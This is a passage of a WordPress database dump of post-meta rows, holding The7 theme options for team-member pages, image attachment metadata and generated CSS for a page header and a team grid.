(8095,2543,'_dt_mobile_page_padding_bottom',''),
(8096,2543,'_dt_mobile_page_padding_left',''),
(8097,2543,'_dt_teammate_options_go_to_single','1'),
(8098,2543,'_dt_teammate_options_position',''),
(8099,2543,'_dt_teammate_options_website',''),
(8100,2543,'_dt_teammate_options_mail',''),
(8101,2543,'_dt_teammate_options_facebook',''),
(8102,2543,'_dt_teammate_options_twitter',''),
(8103,2543,'_dt_teammate_options_dribbble',''),
(8104,2543,'_dt_teammate_options_you-tube',''),
(8105,2543,'_dt_teammate_options_rss',''),
(8106,2543,'_dt_teammate_options_delicious',''),
(8107,2543,'_dt_teammate_options_flickr',''),
(8108,2543,'_dt_teammate_options_lastfm',''),
(8109,2543,'_dt_teammate_options_linkedin',''),
(8110,2543,'_dt_teammate_options_vimeo',''),
(8111,2543,'_dt_teammate_options_tumbler',''),
(8112,2543,'_dt_teammate_options_pinterest',''),
(8113,2543,'_dt_teammate_options_devian',''),
(8114,2543,'_dt_teammate_options_skype',''),
(8115,2543,'_dt_teammate_options_github',''),
(8116,2543,'_dt_teammate_options_instagram',''),
(8117,2543,'_dt_teammate_options_stumbleupon',''),
(8118,2543,'_dt_teammate_options_behance',''),
(8119,2543,'_dt_teammate_options_px-500',''),
(8120,2543,'_dt_teammate_options_tripedvisor',''),
(8121,2543,'_dt_teammate_options_vk',''),
(8122,2543,'_dt_teammate_options_foursquare',''),
(8123,2543,'_dt_teammate_options_xing',''),
(8124,2543,'_dt_teammate_options_weibo',''),
(8125,2543,'_dt_teammate_options_odnoklassniki',''),
(8126,2543,'_dt_teammate_options_research-gate',''),
(8127,2543,'_dt_teammate_options_yelp',''),
(8128,2543,'_dt_teammate_options_blogger',''),
(8129,2543,'_dt_teammate_options_soundcloud',''),
(8130,2543,'_dt_teammate_options_viber',''),
(8131,2543,'_dt_teammate_options_whatsapp',''),
(8132,2543,'_dt_teammate_options_reddit',''),
(8133,2543,'_dt_teammate_options_snapchat',''),
(8134,2543,'_dt_teammate_options_telegram',''),
(8135,2545,'_edit_lock','1665294425:1'),
(8136,2546,'_wp_attached_file','2022/10/1-7.jpg'),
(8137,2546,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:124;s:6:\"height\";i:161;s:4:\"file\";s:15:\"2022/10/1-7.jpg\";s:8:\"filesize\";i:38388;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"1-7-124x150.jpg\";s:5:\"width\";i:124;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5241;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(8138,2545,'_thumbnail_id','2546'),
(8139,2545,'_edit_last','1'),
(8140,2545,'_dt_sidebar_position','disabled'),
(8141,2545,'_dt_sidebar_widgetarea_id','sidebar_1'),
(8142,2545,'_dt_sidebar_hide_on_mobile','0'),
(8143,2545,'_dt_footer_show','1'),
(8144,2545,'_dt_footer_widgetarea_id','sidebar_2'),
(8145,2545,'_dt_footer_hide_on_mobile','0'),
(8146,2545,'_dt_header_title','fancy'),
(8147,2545,'_dt_header_background','normal'),
(8148,2545,'_dt_header_background_below_slideshow','disabled'),
(8149,2545,'_dt_header_transparent_bg_color_scheme','light'),
(8150,2545,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(8151,2545,'_dt_header_transparent_top_bar_bg_opacity','25'),
(8152,2545,'_dt_header_transparent_bg_color','#000000'),
(8153,2545,'_dt_header_transparent_bg_opacity','50'),
(8154,2545,'_dt_header_disabled_background','normal'),
(8155,2545,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(8156,2545,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(8157,2545,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(8158,2545,'_dt_header_disabled_transparent_bg_color','#000000'),
(8159,2545,'_dt_header_disabled_transparent_bg_opacity','50'),
(8160,2545,'_dt_page_overrides_top_margin',''),
(8161,2545,'_dt_page_overrides_right_margin',''),
(8162,2545,'_dt_page_overrides_bottom_margin',''),
(8163,2545,'_dt_page_overrides_left_margin',''),
(8164,2545,'_dt_mobile_page_padding_top',''),
(8165,2545,'_dt_mobile_page_padding_right',''),
(8166,2545,'_dt_mobile_page_padding_bottom',''),
(8167,2545,'_dt_mobile_page_padding_left',''),
(8168,2545,'_dt_teammate_options_go_to_single','1'),
(8169,2545,'_dt_teammate_options_position',''),
(8170,2545,'_dt_teammate_options_website',''),
(8171,2545,'_dt_teammate_options_mail',''),
(8172,2545,'_dt_teammate_options_facebook',''),
(8173,2545,'_dt_teammate_options_twitter',''),
(8174,2545,'_dt_teammate_options_dribbble',''),
(8175,2545,'_dt_teammate_options_you-tube',''),
(8176,2545,'_dt_teammate_options_rss',''),
(8177,2545,'_dt_teammate_options_delicious',''),
(8178,2545,'_dt_teammate_options_flickr',''),
(8179,2545,'_dt_teammate_options_lastfm',''),
(8180,2545,'_dt_teammate_options_linkedin',''),
(8181,2545,'_dt_teammate_options_vimeo',''),
(8182,2545,'_dt_teammate_options_tumbler',''),
(8183,2545,'_dt_teammate_options_pinterest',''),
(8184,2545,'_dt_teammate_options_devian',''),
(8185,2545,'_dt_teammate_options_skype',''),
(8186,2545,'_dt_teammate_options_github',''),
(8187,2545,'_dt_teammate_options_instagram',''),
(8188,2545,'_dt_teammate_options_stumbleupon',''),
(8189,2545,'_dt_teammate_options_behance',''),
(8190,2545,'_dt_teammate_options_px-500',''),
(8191,2545,'_dt_teammate_options_tripedvisor',''),
(8192,2545,'_dt_teammate_options_vk',''),
(8193,2545,'_dt_teammate_options_foursquare',''),
(8194,2545,'_dt_teammate_options_xing',''),
(8195,2545,'_dt_teammate_options_weibo',''),
(8196,2545,'_dt_teammate_options_odnoklassniki',''),
(8197,2545,'_dt_teammate_options_research-gate',''),
(8198,2545,'_dt_teammate_options_yelp',''),
(8199,2545,'_dt_teammate_options_blogger',''),
(8200,2545,'_dt_teammate_options_soundcloud',''),
(8201,2545,'_dt_teammate_options_viber',''),
(8202,2545,'_dt_teammate_options_whatsapp',''),
(8203,2545,'_dt_teammate_options_reddit',''),
(8204,2545,'_dt_teammate_options_snapchat',''),
(8205,2545,'_dt_teammate_options_telegram',''),
(8206,2547,'_edit_lock','1665294438:1'),
(8207,2548,'_wp_attached_file','2022/10/2-7.jpg'),
(8208,2548,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:146;s:6:\"height\";i:176;s:4:\"file\";s:15:\"2022/10/2-7.jpg\";s:8:\"filesize\";i:40204;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"2-7-146x150.jpg\";s:5:\"width\";i:146;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5947;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(8209,2547,'_thumbnail_id','2548'),
(8210,2547,'_edit_last','1'),
(8211,2547,'_dt_sidebar_position','disabled'),
(8212,2547,'_dt_sidebar_widgetarea_id','sidebar_1'),
(8213,2547,'_dt_sidebar_hide_on_mobile','0'),
(8214,2547,'_dt_footer_show','1'),
(8215,2547,'_dt_footer_widgetarea_id','sidebar_2'),
(8216,2547,'_dt_footer_hide_on_mobile','0'),
(8217,2547,'_dt_header_title','fancy'),
(8218,2547,'_dt_header_background','normal'),
(8219,2547,'_dt_header_background_below_slideshow','disabled'),
(8220,2547,'_dt_header_transparent_bg_color_scheme','light'),
(8221,2547,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(8222,2547,'_dt_header_transparent_top_bar_bg_opacity','25'),
(8223,2547,'_dt_header_transparent_bg_color','#000000'),
(8224,2547,'_dt_header_transparent_bg_opacity','50'),
(8225,2547,'_dt_header_disabled_background','normal'),
(8226,2547,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(8227,2547,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(8228,2547,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(8229,2547,'_dt_header_disabled_transparent_bg_color','#000000'),
(8230,2547,'_dt_header_disabled_transparent_bg_opacity','50'),
(8231,2547,'_dt_page_overrides_top_margin',''),
(8232,2547,'_dt_page_overrides_right_margin',''),
(8233,2547,'_dt_page_overrides_bottom_margin',''),
(8234,2547,'_dt_page_overrides_left_margin',''),
(8235,2547,'_dt_mobile_page_padding_top',''),
(8236,2547,'_dt_mobile_page_padding_right',''),
(8237,2547,'_dt_mobile_page_padding_bottom',''),
(8238,2547,'_dt_mobile_page_padding_left',''),
(8239,2547,'_dt_teammate_options_go_to_single','1'),
(8240,2547,'_dt_teammate_options_position',''),
(8241,2547,'_dt_teammate_options_website',''),
(8242,2547,'_dt_teammate_options_mail',''),
(8243,2547,'_dt_teammate_options_facebook',''),
(8244,2547,'_dt_teammate_options_twitter',''),
(8245,2547,'_dt_teammate_options_dribbble',''),
(8246,2547,'_dt_teammate_options_you-tube',''),
(8247,2547,'_dt_teammate_options_rss',''),
(8248,2547,'_dt_teammate_options_delicious',''),
(8249,2547,'_dt_teammate_options_flickr',''),
(8250,2547,'_dt_teammate_options_lastfm',''),
(8251,2547,'_dt_teammate_options_linkedin',''),
(8252,2547,'_dt_teammate_options_vimeo',''),
(8253,2547,'_dt_teammate_options_tumbler',''),
(8254,2547,'_dt_teammate_options_pinterest',''),
(8255,2547,'_dt_teammate_options_devian',''),
(8256,2547,'_dt_teammate_options_skype',''),
(8257,2547,'_dt_teammate_options_github',''),
(8258,2547,'_dt_teammate_options_instagram',''),
(8259,2547,'_dt_teammate_options_stumbleupon',''),
(8260,2547,'_dt_teammate_options_behance',''),
(8261,2547,'_dt_teammate_options_px-500',''),
(8262,2547,'_dt_teammate_options_tripedvisor',''),
(8263,2547,'_dt_teammate_options_vk',''),
(8264,2547,'_dt_teammate_options_foursquare',''),
(8265,2547,'_dt_teammate_options_xing',''),
(8266,2547,'_dt_teammate_options_weibo',''),
(8267,2547,'_dt_teammate_options_odnoklassniki',''),
(8268,2547,'_dt_teammate_options_research-gate',''),
(8269,2547,'_dt_teammate_options_yelp',''),
(8270,2547,'_dt_teammate_options_blogger',''),
(8271,2547,'_dt_teammate_options_soundcloud',''),
(8272,2547,'_dt_teammate_options_viber',''),
(8273,2547,'_dt_teammate_options_whatsapp',''),
(8274,2547,'_dt_teammate_options_reddit',''),
(8275,2547,'_dt_teammate_options_snapchat',''),
(8276,2547,'_dt_teammate_options_telegram',''),
(8277,2549,'_edit_lock','1665294406:1'),
(8278,2550,'_wp_attached_file','2022/10/3-3.jpg'),
(8279,2550,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:158;s:6:\"height\";i:158;s:4:\"file\";s:15:\"2022/10/3-3.jpg\";s:8:\"filesize\";i:39686;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"3-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5042;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(8280,2549,'_thumbnail_id','2550'),
(8281,2549,'_edit_last','1'),
(8282,2549,'_dt_sidebar_position','disabled'),
(8283,2549,'_dt_sidebar_widgetarea_id','sidebar_1'),
(8284,2549,'_dt_sidebar_hide_on_mobile','0'),
(8285,2549,'_dt_footer_show','1'),
(8286,2549,'_dt_footer_widgetarea_id','sidebar_2'),
(8287,2549,'_dt_footer_hide_on_mobile','0'),
(8288,2549,'_dt_header_title','fancy'),
(8289,2549,'_dt_header_background','normal'),
(8290,2549,'_dt_header_background_below_slideshow','disabled'),
(8291,2549,'_dt_header_transparent_bg_color_scheme','light'),
(8292,2549,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(8293,2549,'_dt_header_transparent_top_bar_bg_opacity','25'),
(8294,2549,'_dt_header_transparent_bg_color','#000000'),
(8295,2549,'_dt_header_transparent_bg_opacity','50'),
(8296,2549,'_dt_header_disabled_background','normal'),
(8297,2549,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(8298,2549,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(8299,2549,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(8300,2549,'_dt_header_disabled_transparent_bg_color','#000000'),
(8301,2549,'_dt_header_disabled_transparent_bg_opacity','50'),
(8302,2549,'_dt_page_overrides_top_margin',''),
(8303,2549,'_dt_page_overrides_right_margin',''),
(8304,2549,'_dt_page_overrides_bottom_margin',''),
(8305,2549,'_dt_page_overrides_left_margin',''),
(8306,2549,'_dt_mobile_page_padding_top',''),
(8307,2549,'_dt_mobile_page_padding_right',''),
(8308,2549,'_dt_mobile_page_padding_bottom',''),
(8309,2549,'_dt_mobile_page_padding_left',''),
(8310,2549,'_dt_teammate_options_go_to_single','1'),
(8311,2549,'_dt_teammate_options_position',''),
(8312,2549,'_dt_teammate_options_website',''),
(8313,2549,'_dt_teammate_options_mail',''),
(8314,2549,'_dt_teammate_options_facebook',''),
(8315,2549,'_dt_teammate_options_twitter',''),
(8316,2549,'_dt_teammate_options_dribbble',''),
(8317,2549,'_dt_teammate_options_you-tube',''),
(8318,2549,'_dt_teammate_options_rss',''),
(8319,2549,'_dt_teammate_options_delicious',''),
(8320,2549,'_dt_teammate_options_flickr',''),
(8321,2549,'_dt_teammate_options_lastfm',''),
(8322,2549,'_dt_teammate_options_linkedin',''),
(8323,2549,'_dt_teammate_options_vimeo',''),
(8324,2549,'_dt_teammate_options_tumbler',''),
(8325,2549,'_dt_teammate_options_pinterest',''),
(8326,2549,'_dt_teammate_options_devian',''),
(8327,2549,'_dt_teammate_options_skype',''),
(8328,2549,'_dt_teammate_options_github',''),
(8329,2549,'_dt_teammate_options_instagram',''),
(8330,2549,'_dt_teammate_options_stumbleupon',''),
(8331,2549,'_dt_teammate_options_behance',''),
(8332,2549,'_dt_teammate_options_px-500',''),
(8333,2549,'_dt_teammate_options_tripedvisor',''),
(8334,2549,'_dt_teammate_options_vk',''),
(8335,2549,'_dt_teammate_options_foursquare',''),
(8336,2549,'_dt_teammate_options_xing',''),
(8337,2549,'_dt_teammate_options_weibo',''),
(8338,2549,'_dt_teammate_options_odnoklassniki',''),
(8339,2549,'_dt_teammate_options_research-gate',''),
(8340,2549,'_dt_teammate_options_yelp',''),
(8341,2549,'_dt_teammate_options_blogger',''),
(8342,2549,'_dt_teammate_options_soundcloud',''),
(8343,2549,'_dt_teammate_options_viber',''),
(8344,2549,'_dt_teammate_options_whatsapp',''),
(8345,2549,'_dt_teammate_options_reddit',''),
(8346,2549,'_dt_teammate_options_snapchat',''),
(8347,2549,'_dt_teammate_options_telegram',''),
(8363,2095,'_dt_fancy_header_layout_heading',''),
(8364,2095,'_dt_fancy_header_title_aligment','center'),
(8365,2095,'_dt_fancy_header_height','300'),
(8366,2095,'_dt_fancy_header_padding-top','0px'),
(8367,2095,'_dt_fancy_header_padding-bottom','0px'),
(8368,2095,'_dt_fancy_header_breadcrumbs_heading',''),
(8369,2095,'_dt_fancy_header_breadcrumbs','disabled'),
(8370,2095,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(8371,2095,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(8372,2095,'_dt_fancy_header_title_heading',''),
(8373,2095,'_dt_fancy_header_title_mode','custom'),
(8374,2095,'_dt_fancy_header_title',''),
(8375,2095,'_dt_fancy_header_title_font_size','30'),
(8376,2095,'_dt_fancy_header_title_line_height','36'),
(8377,2095,'_dt_fancy_header_text_transform','none'),
(8378,2095,'_dt_fancy_header_title_color_mode','color'),
(8379,2095,'_dt_fancy_header_title_color','#ffffff'),
(8380,2095,'_dt_fancy_header_subtitle_heading',''),
(8381,2095,'_dt_fancy_header_subtitle',''),
(8382,2095,'_dt_fancy_header_subtitle_font_size','18'),
(8383,2095,'_dt_fancy_header_subtitle_line_height','26'),
(8384,2095,'_dt_fancy_header_subtitle_text_transform','none'),
(8385,2095,'_dt_fancy_header_subtitle_color_mode','color'),
(8386,2095,'_dt_fancy_header_subtitle_color','#ffffff'),
(8387,2095,'_dt_fancy_header_bg_heading',''),
(8388,2095,'_dt_fancy_header_bg_color','#000000'),
(8389,2095,'_dt_fancy_header_bg_image_origin','featured_image'),
(8390,2095,'_dt_fancy_header_bg_image','a:0:{}'),
(8391,2095,'_dt_fancy_header_bg_repeat','no-repeat'),
(8392,2095,'_dt_fancy_header_bg_position_x','center'),
(8393,2095,'_dt_fancy_header_bg_position_y','center'),
(8394,2095,'_dt_fancy_header_bg_fullscreen','1'),
(8395,2095,'_dt_fancy_header_bg_overlay','0'),
(8396,2095,'_dt_fancy_header_overlay_color','#000'),
(8397,2095,'_dt_fancy_header_bg_overlay_opacity','50'),
(8398,2095,'_dt_fancy_header_scroll_effect','default'),
(8399,2095,'_dt_fancy_header_bg_parallax','0.5'),
(8400,2095,'_dt_fancy_header_responsiveness_heading',''),
(8401,2095,'_dt_fancy_header_responsiveness','enabled'),
(8402,2095,'_dt_fancy_header_responsiveness_switch','778px'),
(8403,2095,'_dt_fancy_header_responsive_height','70'),
(8404,2095,'_dt_fancy_header_responsive_font_size','30'),
(8405,2095,'_dt_fancy_header_responsive_title_line_height','38'),
(8406,2095,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(8407,2095,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(8408,2095,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(8409,2095,'_dt_microsite_primary_menu',''),
(8410,2095,'_dt_microsite_split_left_menu',''),
(8411,2095,'_dt_microsite_split_right_menu',''),
(8412,2095,'_dt_microsite_mobile_menu',''),
(8413,2095,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2020/05/mmp.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #000000;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(8414,2095,'_wp_old_slug','the7-online-courses-education'),
(8415,2553,'_wp_attached_file','2020/04/m2ws3.jpg'),
(8416,2553,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:372;s:6:\"height\";i:189;s:4:\"file\";s:17:\"2020/04/m2ws3.jpg\";s:8:\"filesize\";i:54288;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"m2ws3-300x152.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6592;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"m2ws3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4960;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(8419,2095,'the7_shortcodes_dynamic_css','a:2:{s:32:\"1744dc4fc9a9301dff01889f665ab835\";s:6508:\".dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835 .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835  .team-media {\n  padding: 0px 0px 0px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835 .dt-css-grid .team-media img {\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835 .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835  .team-media img {\n  border-radius: 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835.resize-by-browser-width .dt-css-grid .wf-cell,\n  